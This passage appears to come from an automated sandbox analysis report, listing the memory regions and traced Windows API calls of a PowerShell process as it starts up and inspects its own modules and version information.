start_va = 0x26c0000 end_va = 0x26c0fff entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 3572 start_va = 0x26d0000 end_va = 0x26d4fff entry_point = 0x26d0000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 3573 start_va = 0x27f0000 end_va = 0x2830fff entry_point = 0x27f0000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 3574 start_va = 0x72860000 end_va = 0x72b41fff entry_point = 0x72860000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 3575 start_va = 0x72860000 end_va = 0x72b41fff entry_point = 0x72860000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 3576 start_va = 0x2720000 end_va = 0x2727fff entry_point = 0x2720000 region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 3577 start_va = 0x2730000 end_va = 0x2730fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002730000" filename = "" Region: id = 3578 start_va = 0x2870000 end_va = 0x28b2fff entry_point = 0x2870000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 3579 start_va = 0x67aa0000 end_va = 0x67ae2fff entry_point = 0x67aa0000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 3580 start_va = 0x71c70000 end_va = 0x71d0bfff entry_point = 0x71c70000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll") Region: id = 3581 start_va = 0x71d10000 end_va = 0x71d94fff entry_point = 0x71d10000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\ee28a075665b6bc23b6dae56903d431d\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\ee28a075665b6bc23b6dae56903d431d\\microsoft.wsman.management.ni.dll") Region: id = 3582 start_va = 0x71da0000 end_va = 0x71fd4fff entry_point = 0x71da0000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll") Region: id = 3583 start_va = 0x750d0000 end_va = 0x7511afff entry_point = 0x750d0000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4f68cd04686e5dc5a55070d112d44bdf\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4f68cd04686e5dc5a55070d112d44bdf\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 3584 start_va = 0x75380000 end_va = 0x753a4fff entry_point = 0x75380000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll") Region: id = 3769 start_va = 0x2740000 end_va = 0x2740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002740000" filename = "" Region: id = 3770 start_va = 0x60340000 end_va = 0x60347fff entry_point = 0x60340000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll") Region: id = 3771 start_va = 0x74360000 end_va = 0x74422fff entry_point = 0x74360000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8df695fb80187f65208d87229e81e8a2\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8df695fb80187f65208d87229e81e8a2\\microsoft.powershell.commands.management.ni.dll") Region: id = 3772 start_va = 0x74430000 end_va = 0x745cdfff entry_point = 0x74430000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\3008a05e2928e2c1d856cc34e0422c17\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\3008a05e2928e2c1d856cc34e0422c17\\microsoft.powershell.commands.utility.ni.dll") Region: id = 3773 start_va = 0x75070000 end_va = 0x7509cfff entry_point = 0x75070000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8ce205027e30804d1b2deaffa0582735\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8ce205027e30804d1b2deaffa0582735\\microsoft.powershell.security.ni.dll") Region: id = 3892 start_va = 0x2740000 end_va = 0x274ffff entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 3893 start_va = 0x4e00000 end_va = 0x4e53fff entry_point = 0x4e00000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll") Region: id = 3894 start_va = 0x71a40000 end_va = 0x71b53fff entry_point = 0x71a40000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll") Region: id = 3895 start_va = 0x71b60000 end_va = 0x71c63fff entry_point = 0x71b60000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll") Region: id = 3896 start_va = 0x73e20000 end_va = 0x74355fff entry_point = 0x73e20000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll") Region: id = 3897 start_va = 0x74660000 end_va = 0x74664fff entry_point = 0x74660000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 3904 start_va = 0x2840000 end_va = 0x2850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002840000" filename = "" Region: id = 3924 start_va = 0x2750000 end_va = 0x275ffff entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 3925 start_va = 0x27a0000 end_va = 0x27affff entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 3926 start_va = 0x28c0000 end_va = 0x28cffff entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 3927 start_va = 0x4ab0000 end_va = 0x4abffff entry_point = 0x0 region_type = private name = "private_0x0000000004ab0000" filename = "" Region: id = 3928 start_va = 0x4ac0000 end_va = 0x4acffff entry_point = 0x0 region_type = private name = "private_0x0000000004ac0000" filename = "" Region: id = 3929 start_va = 0x4e60000 end_va = 0x4e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 3930 start_va = 0x4e70000 end_va = 0x4e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 3931 start_va = 0x4e80000 end_va = 0x4e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e80000" filename = "" Region: id = 3932 start_va = 0x74650000 end_va = 0x74657fff entry_point = 0x74650000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3946 start_va = 0x4e90000 end_va = 0x4f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e90000" filename = "" Region: id = 4072 start_va = 0x4f10000 end_va = 0x4f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 4073 start_va = 0x4f20000 end_va = 0x51f1fff entry_point = 0x4f20000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 4074 start_va = 0x5200000 end_va = 0x5200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005200000" filename = "" Region: id = 4075 start_va = 0x64e70000 end_va = 0x65141fff entry_point = 0x64e70000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 4076 start_va = 0x713e0000 end_va = 0x71a30fff entry_point = 0x713e0000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Data\\1e85062785e286cd9eae9c26d2c61f73\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.data\\1e85062785e286cd9eae9c26d2c61f73\\system.data.ni.dll") Region: id = 4077 start_va = 0x76330000 end_va = 0x7644cfff entry_point = 0x76330000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 4078 start_va = 0x76450000 end_va = 0x76484fff entry_point = 0x76450000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4079 start_va = 0x77800000 end_va = 0x7780bfff entry_point = 0x77800000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 4080 start_va = 0x77df0000 end_va = 0x77df5fff entry_point = 0x77df0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4081 start_va = 0x5210000 end_va = 0x521ffff entry_point = 0x0 region_type = private name = "private_0x0000000005210000" filename = "" Region: id = 4082 start_va = 0x5220000 end_va = 0x5220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005220000" filename = "" Region: id = 4083 start_va = 0x745f0000 end_va = 0x7464afff entry_point = 0x745f0000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll") Region: id = 4087 start_va = 0x5230000 end_va = 0x523ffff entry_point = 0x0 region_type = private name = "private_0x0000000005230000" filename = "" Region: id = 4088 start_va = 0x5240000 end_va = 0x524ffff entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 4103 start_va = 0x5250000 end_va = 0x525ffff entry_point = 0x0 region_type = private name = "private_0x0000000005250000" filename = "" Region: id = 4104 start_va = 0x5260000 end_va = 0x5260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005260000" filename = "" Region: id = 4105 start_va = 0x5340000 end_va = 0x537ffff entry_point = 0x0 region_type = private name = "private_0x0000000005340000" filename = "" Region: id = 4106 start_va = 0x53c0000 end_va = 0x53fffff entry_point = 0x0 region_type = private name = "private_0x00000000053c0000" filename = "" Region: id = 4107 start_va = 0x5440000 end_va = 0x5dcffff entry_point = 0x0 region_type = private name = "private_0x0000000005440000" filename = "" Region: id = 4108 start_va = 0x5e3a0000 end_va = 0x5e42cfff entry_point = 0x5e3a0000 region_type = mapped_file name = "diasymreader.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\diasymreader.dll") Region: id = 4109 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 4123 start_va = 0x5270000 end_va = 0x527ffff entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" Region: id = 4124 start_va = 0x5dd0000 end_va = 0x5ecffff entry_point = 0x0 region_type = private name = "private_0x0000000005dd0000" filename = "" Region: id = 4127 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Thread: id = 156 os_tid = 0x9b0 [0141.963] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0142.077] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0142.077] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0142.077] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0142.077] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0142.568] GetVersionExW (in: lpVersionInformation=0x357ea0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x357ea0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0142.568] GetLastError () returned 0x2 [0142.569] GetVersionExW (in: lpVersionInformation=0x357ea0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x357ea0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0142.569] GetLastError () returned 0x2 [0142.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e55c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.574] GetLastError () returned 0x2 [0142.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e578, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.580] GetLastError () returned 0x2 [0142.580] GetVersionExW (in: lpVersionInformation=0x357ea0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x357ea0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0142.580] GetLastError () returned 0x2 [0142.581] SetErrorMode (uMode=0x1) returned 0x1 [0142.582] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x23e9f8 | out: lpFileInformation=0x23e9f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0142.582] GetLastError () returned 0x2 [0142.582] SetErrorMode (uMode=0x1) returned 0x1 [0142.585] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x23ea7c | out: lpdwHandle=0x23ea7c) returned 0x94c [0142.586] GetLastError () returned 0x0 [0142.587] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2914d8c | out: lpData=0x2914d8c) returned 1 [0142.591] VerQueryValueW (in: pBlock=0x2914d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x23ea48, puLen=0x23ea44 | out: lplpBuffer=0x23ea48*=0x2914e28, puLen=0x23ea44) returned 1 [0142.593] lstrlenW (lpString="䅁") returned 1 [0142.611] VerQueryValueW (in: pBlock=0x2914d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x23e9c4, puLen=0x23e9c0 | out: lplpBuffer=0x23e9c4*=0x2914f04, puLen=0x23e9c0) returned 1 [0142.611] lstrlenW (lpString="Microsoft Corporation") returned 21 [0142.613] lstrcpyW (in: lpString1=0x357e88, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0142.613] VerQueryValueW (in: pBlock=0x2914d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x23e9c4, puLen=0x23e9c0 | out: lplpBuffer=0x23e9c4*=0x2914f58, puLen=0x23e9c0) returned 1 [0142.613] lstrlenW (lpString="System.Management.Automation") returned 28 [0142.613] lstrcpyW (in: lpString1=0x357e88, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0142.613] VerQueryValueW (in: pBlock=0x2914d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x23e9c4, puLen=0x23e9c0 | out: lplpBuffer=0x23e9c4*=0x2914fb4, puLen=0x23e9c0) returned 1 [0142.613] lstrlenW (lpString="6.1.7601.17514") returned 14 [0142.613] lstrcpyW (in: lpString1=0x357e88, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0142.613] VerQueryValueW (in: pBlock=0x2914d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x23e9c4, puLen=0x23e9c0 | out: lplpBuffer=0x23e9c4*=0x2914ff4, puLen=0x23e9c0) returned 1 [0142.613] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0142.613] lstrcpyW (in: lpString1=0x357e88, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0142.613] VerQueryValueW (in: pBlock=0x2914d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x23e9c4, puLen=0x23e9c0 | out: lplpBuffer=0x23e9c4*=0x291505c, puLen=0x23e9c0) returned 1 [0142.613] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0142.613] lstrcpyW (in: lpString1=0x357e88, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0142.614] VerQueryValueW (in: pBlock=0x2914d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x23e9c4, puLen=0x23e9c0 | out: lplpBuffer=0x23e9c4*=0x29150f8, puLen=0x23e9c0) returned 1 [0142.614] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0142.614] lstrcpyW (in: lpString1=0x357e88, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0142.614] VerQueryValueW (in: pBlock=0x2914d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x23e9c4, puLen=0x23e9c0 | out: lplpBuffer=0x23e9c4*=0x291515c, puLen=0x23e9c0) returned 1 [0142.614] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0142.614] lstrcpyW (in: lpString1=0x357e88, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0142.614] VerQueryValueW (in: pBlock=0x2914d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x23e9c4, puLen=0x23e9c0 | out: lplpBuffer=0x23e9c4*=0x29151d8, puLen=0x23e9c0) returned 1 [0142.614] lstrlenW (lpString="6.1.7601.17514") returned 14 [0142.614] lstrcpyW (in: lpString1=0x357e88, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0142.614] VerQueryValueW (in: pBlock=0x2914d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x23e9c4, puLen=0x23e9c0 | out: lplpBuffer=0x23e9c4*=0x2914e80, puLen=0x23e9c0) returned 1 [0142.614] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0142.614] lstrcpyW (in: lpString1=0x357e88, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0142.614] VerQueryValueW (in: pBlock=0x2914d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x23e9c4, puLen=0x23e9c0 | out: lplpBuffer=0x23e9c4*=0x0, puLen=0x23e9c0) returned 0 [0142.614] VerQueryValueW (in: pBlock=0x2914d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x23e9c4, puLen=0x23e9c0 | out: lplpBuffer=0x23e9c4*=0x0, puLen=0x23e9c0) returned 0 [0142.614] VerQueryValueW (in: pBlock=0x2914d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x23e9c4, puLen=0x23e9c0 | out: lplpBuffer=0x23e9c4*=0x0, puLen=0x23e9c0) returned 0 [0142.614] VerQueryValueW (in: pBlock=0x2914d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x23e9b8, puLen=0x23e9b4 | out: lplpBuffer=0x23e9b8*=0x2914e28, puLen=0x23e9b4) returned 1 [0142.616] VerLanguageNameW (in: wLang=0x0, szLang=0x357e88, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0142.617] VerQueryValueW (in: pBlock=0x2914d8c, lpSubBlock="\\", lplpBuffer=0x23e9cc, puLen=0x23e9c8 | out: lplpBuffer=0x23e9cc*=0x2914db4, puLen=0x23e9c8) returned 1 [0142.621] GetCurrentProcessId () returned 0x9c4 [0142.628] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x23e204 | out: lpLuid=0x23e204*(LowPart=0x14, HighPart=0)) returned 1 [0142.629] GetLastError () returned 0x0 [0142.630] GetCurrentProcess () returned 0xffffffff [0142.630] GetLastError () returned 0x0 [0142.632] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x23e200 | out: TokenHandle=0x23e200*=0x304) returned 1 [0142.632] GetLastError () returned 0x0 [0142.634] AdjustTokenPrivileges (in: TokenHandle=0x304, DisableAllPrivileges=0, NewState=0x29178cc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0142.634] GetLastError () returned 0x0 [0142.636] CloseHandle (hObject=0x304) returned 1 [0142.636] GetLastError () returned 0x0 [0142.639] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c4) returned 0x304 [0142.639] GetLastError () returned 0x0 [0142.649] EnumProcessModules (in: hProcess=0x304, lphModule=0x2917910, cb=0x100, lpcbNeeded=0x23e9f4 | out: lphModule=0x2917910, lpcbNeeded=0x23e9f4) returned 1 [0142.650] GetLastError () returned 0x0 [0142.653] GetModuleInformation (in: hProcess=0x304, hModule=0x21fb0000, lpmodinfo=0x2917a50, cb=0xc | out: lpmodinfo=0x2917a50*(lpBaseOfDll=0x21fb0000, SizeOfImage=0x72000, EntryPoint=0x21fb7363)) returned 1 [0142.653] GetLastError () returned 0x0 [0142.655] GetModuleBaseNameW (in: hProcess=0x304, hModule=0x21fb0000, lpBaseName=0x348b88, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0142.655] GetLastError () returned 0x0 [0142.656] GetModuleFileNameExW (in: hProcess=0x304, hModule=0x21fb0000, lpFilename=0x348b88, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0142.656] GetLastError () returned 0x0 [0142.657] CloseHandle (hObject=0x304) returned 1 [0142.657] GetLastError () returned 0x0 [0142.658] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x9c4) returned 0x304 [0142.658] GetLastError () returned 0x0 [0142.659] GetExitCodeProcess (in: hProcess=0x304, lpExitCode=0x2916f00 | out: lpExitCode=0x2916f00*=0x103) returned 1 [0142.659] GetLastError () returned 0x0 [0142.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3915278, Length=0x20000, ResultLength=0x23ea3c | out: SystemInformation=0x3915278, ResultLength=0x23ea3c*=0xa9c8) 